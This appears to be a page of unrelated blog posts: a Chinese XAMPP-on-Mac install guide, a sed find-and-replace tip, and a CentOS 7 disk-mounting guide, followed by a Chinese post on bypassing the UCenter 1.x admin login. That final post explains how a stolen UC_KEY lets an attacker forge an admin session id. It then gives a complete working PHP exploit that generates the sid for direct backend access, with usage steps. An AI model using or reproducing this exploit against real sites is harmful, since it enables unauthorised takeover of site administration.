在Mac下安装XAMPP

XAMPP 是个啥?
来自官方的简介:适用于 Mac OS X 的 XAMPP 是 Mac OS X 上最简单,最实用,也最完整的网络服务器解决方案。该发行版包括整合了最新的 MySQL、PHP,和 Perl 的 Apache 2 服务器。它以 Mac OS X 安装包的方式发布,包含所有必须的文件,无需下载其它东西。

如果您是一位有经验的网络开发人员,或者是需要运行服务器、创建的动态网页或使用数据库的 Mac 爱好者,这就是您要找的东西!

该版本需要 Mac OS X 10.4 (Intel&PPC) 或更高。
下载安装
1,下载文件:XAMPP Mac OS X 1.7.3,然后双击安装。
2,安装完成后,使用下面的命令开始运行 XAMPP。在终端下以系统管理员 root 的身份登录:

sudo su

使用下面的命令启动 XAMPP:

/Applications/XAMPP/xamppfiles/xampp start

如果你能在屏幕上看到类似下面的提示信息:
Starting XAMPP for MacOS X 1.7.3…
XAMPP: Starting Apache with SSL (and PHP5)…
XAMPP: Starting MySQL…
XAMPP: Starting ProFTPD…
XAMPP for MacOS X started.
那么恭喜你,安装成功!
3,如果你在 XAMPP: Starting ProFTPD… 这一步出现如下错误:
XAMPP: Starting ProFTPD…/Applications/XAMPP/xamppfiles/xampp: line 184: /Applications/XAMPP/xamppfiles//var/proftpd/start.err: No such file or directory
fail.
Contents of “/Applications/XAMPP/xamppfiles//var/proftpd/start.err”:
cat: /Applications/XAMPP/xamppfiles//var/proftpd/start.err: No such file or directory

只需运行如下命令:

sudo mkdir /Applications/XAMPP/xamppfiles/var/proftpd/
touch /Applications/XAMPP/xamppfiles/var/proftpd/start.err
sudo /Applications/XAMPP/xamppfiles/xampp fix_rights

然后重新进行2中的操作即可
4,安装成功之后在浏览器中输入 http://localhost,你可以看到如下页面了!

How to use sed to find and replace text in files in Linux / Unix shell


This is self-explanatory!

find . -type f -exec sed -i 's/oldstr/newstr/g' {} +

We used to replace ‘/wp-content/uploads’ with ‘/files’ while merging single wordpress-sites into a big multisite setup.

find . -type f -exec sed -i 's/\/wp-content\/uploads/\/files/g' {} +

Adding a hard drive in CentOS 7

Whether installing a new physical hard drive to a server or adding an additional disk to your cloud server or VPS, you’ll need to configure CentOS to be able to use it.

We’re going to assume the drive is connected, so first of all we need to find it.

First of all, we need to know the naming convention your server is using for drives, and we can find this with the ‘df’ command.

[user@server ~] df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/vda2 24733776 2521604 20942668 11% /
/dev/vda1 1007512 203260 751824 22% /boot

The two lines above show that this particular server is using the vd* notation, but sd* is also used. Here the primary drive, vda, has two partitions – vda1 and vda2.

We can now use the following command to find other disks:

[user@server ~] ls -1 /dev/[sv]d[a-z]
/dev/vda
/dev/vdb

We can see both our original disk, vda, and the new disk vdb. Now to create a filesystem the new disk with the ‘mkfs.ext4’ utility.

[user@server ~] sudo mkfs.ext4 /dev/vdb

This will just take a few seconds.

To use the new disk we now need to mount it. When you’ve decided where you want to mount the disk, first create that folder on your server. We’re going to use ‘home2’ for our disk.

[user@server ~] sudo mkdir /home2

We can now mount the disk to that location:

[user@server ~] sudo mount /dev/vdb /home2

Revisiting the df command we can now see that the new disk is mounted.

[user@server ~] df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/vda2 24733776 2521604 20942668 11% /
/dev/vda1 1007512 203260 751824 22% /boot
/dev/vdb 25000000 100 24999900 1% /home2

To ensure the disk is automatically mounted when the server is rebooted, we also need to add it to fstab. Our preferred editor is ‘nano’ so we type

[user@server ~] sudo nano /etc/fstab

We add, to the end of the file, the line:

/dev/vdb /home2 ext4 defaults 0 0

Then CTRL + O to save and CTRL + X to exit.

The disk will now stay mounted after reboot and you can begin using it.

ucenter 1.x adminlogin bypass (uckey->sid)

很多时候通过一些方法得到了ucenter的uckey以后都不知道怎么利用(ucenter的配置文件在/data/config.inc.php), 因为ucenter的uckey并不像康盛的其他产品可以通过更新配置文件来插入一句话,那么接下来就说下拿到了ucenter的uckey以后怎么直接杀入后台!
首先假设一种情况, 你扫到了他的bak文件, config.inc.php.bak, 可以看到ucenter的配置文件是如下格式的

define('UC_DBHOST', 'localhost');
define('UC_DBUSER', '****');
define('UC_DBPW', '********');
define('UC_DBNAME', 'ultrax');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', 'pre_ucenter_');
define('UC_COOKIEPATH', '/');
define('UC_COOKIEDOMAIN', '');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_FOUNDERPW', '9eeb9e61111254e3f94988e49ec186a9');
define('UC_FOUNDERSALT', 'N1Pede');
define('UC_KEY', '683T0n5a624o9e7hdr9y9Me27A6z3NecdUel728q2l7b58dD3a3I4oa07xeN3e3a');
define('UC_SITEID', 'U1seBeQ7t280z7F1m8j0g0S1vfu3k7W2t1Mf3dyaE7i0Je78Gct707SbG0J7VdH6');
define('UC_MYKEY', 'l1pejeQ7m2Q0Y781G80080C10fW3d722c1bfJduai7j0yeM8Dct7N7kbf0e7Bdb6');
define('UC_DEBUG', false);
define('UC_PPP', 20);

这句就是uckey了

define('UC_KEY', '683T0n5a624o9e7hdr9y9Me27A6z3NecdUel728q2l7b58dD3a3I4oa07xeN3e3a');

ucenter自身的uckey似乎在整个程序里面没有起到什么实质性的作用, 但是显然这是不可能的,
ucenter自身的uckey实际上是针对ucenter后台登录过程来使用的, 通过这个uckey可以直接算出一串登录字符串, 从而实现不需要帐号密码直接登录ucneter后台, 先来看看ucenter的后台验证代码

// ucenter_dir/model/admin.php

function check_priv() {
$username = $this->sid_decode($this->view->sid);
if(empty($username)) {
header('Location: '.UC_API.'/admin.php?m=user&a=login&iframe='.getgpc('iframe', 'G').($this->cookie_status ? '' : '&sid='.$this->view->sid));
exit;
} else {
$this->user['isfounder'] = $username == 'UCenterAdministrator' ? 1 : 0;
if(!$this->user['isfounder']) {
$admin = $this->db->fetch_first("SELECT a.*, m.* FROM ".UC_DBTABLEPRE."admins a LEFT JOIN ".UC_DBTABLEPRE."members m USING(uid) WHERE a.username='$username'");
if(empty($admin)) {
header('Location: '.UC_API.'/admin.php?m=user&a=login&iframe='.getgpc('iframe', 'G').($this->cookie_status ? '' : '&sid='.$this->view->sid));
exit;
} else {
$this->user = $admin;
$this->user['username'] = $username;
$this->user['admin'] = 1;
$this->view->sid = $this->sid_encode($username);
$this->setcookie('sid', $this->view->sid, 86400);
}
} else {
$this->user['username'] = 'UCenterAdministrator';
$this->user['admin'] = 1;
$this->view->sid = $this->sid_encode($this->user['username']);
$this->setcookie('sid', $this->view->sid, 86400);
}
$this->view->assign('user', $this->user);
}

ucenter的验证函数check_priv起到的作用就是验证当前你是否已经登录, 而他的验证基础并非是帐号密码, 先看第一句

$username = $this->sid_decode($this->view->sid);

通过sid_decode函数来解析传进去的sid值, 这个函数是这样的

// ucenter_dir/model/admin.php
function sid_decode($sid) {
$ip = $this->onlineip;
$agent = $_SERVER['HTTP_USER_AGENT'];
$authkey = md5($ip.$agent.UC_KEY);
$s = $this->authcode(rawurldecode($sid), 'DECODE', $authkey, 1800);
if(empty($s)) {
return FALSE;
}
@list($username, $check) = explode("\t", $s);
if($check == substr(md5($ip.$agent), 0, 8)) {
return $username;
} else {
return FALSE;
}
}

可以看到ucenter在这里的验证基础, 并非是帐号密码, 而是通过uckey加上你的ua和ip等一些信息来进行加密, 而ua信息和ip都是可以伪造的也就是可控的, 所以你只要得到了uckey通过算法计算出正确的sid即可直接登录!
不废话了直接贴exp:

<?php
$uckey = '683T0n5a624o9e7hdr9y9Me27A6z3NecdUel728q2l7b58dD3a3I4oa07xeN3e3a';
//这里替换成你得到的uckey
$username = 'UCenterAdministrator';
$agent = $_SERVER['HTTP_USER_AGENT'];
$cip = getenv('HTTP_CLIENT_IP');
$xip = getenv('HTTP_X_FORWARDED_FOR');
$rip = getenv('REMOTE_ADDR');
$srip = $_SERVER['REMOTE_ADDR'];
if($cip && strcasecmp($cip, 'unknown')) {
$ip = $cip;
} elseif($xip && strcasecmp($xip, 'unknown')) {
$ip = $xip;
} elseif($rip && strcasecmp($rip, 'unknown')) {
$ip = $rip;
} elseif($srip && strcasecmp($srip, 'unknown')) {
$ip = $srip;
}
$ip = '213.1.1.1'; //这个ip替换成你当前的ip , 可以通过ip138查询
$authkey = md5($ip.$agent.$uckey);
$check = substr(md5($ip.$agent), 0, 8);
echo rawurlencode(_authcode("$username\t$check", 'ENCODE', $authkey, 1800));
/*
* 康盛加解密函数
*/
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++){
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++){
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++){
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result.= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE'){
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)){
return substr($result, 26);
}else{
return '';
}
}else{
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>

保存成任意php文件通过网页访问即可返回出sid值, 这个时候用得到的sid值直接放到admin.php?sid=xxxxxxxxx里面即可直接进入后台, 我本地演示下

然后运行一下

这一串就是得出的sid值, 直接访问admin.php?sid=321cGMQBc6iB9kC24jBzFeLGwMrJURbVQjJk6qmnO3iAxNHOqwfLoX54Bh8Qrj0SFl4dGeiFQHT6Fg即可直接秒进后台了~~~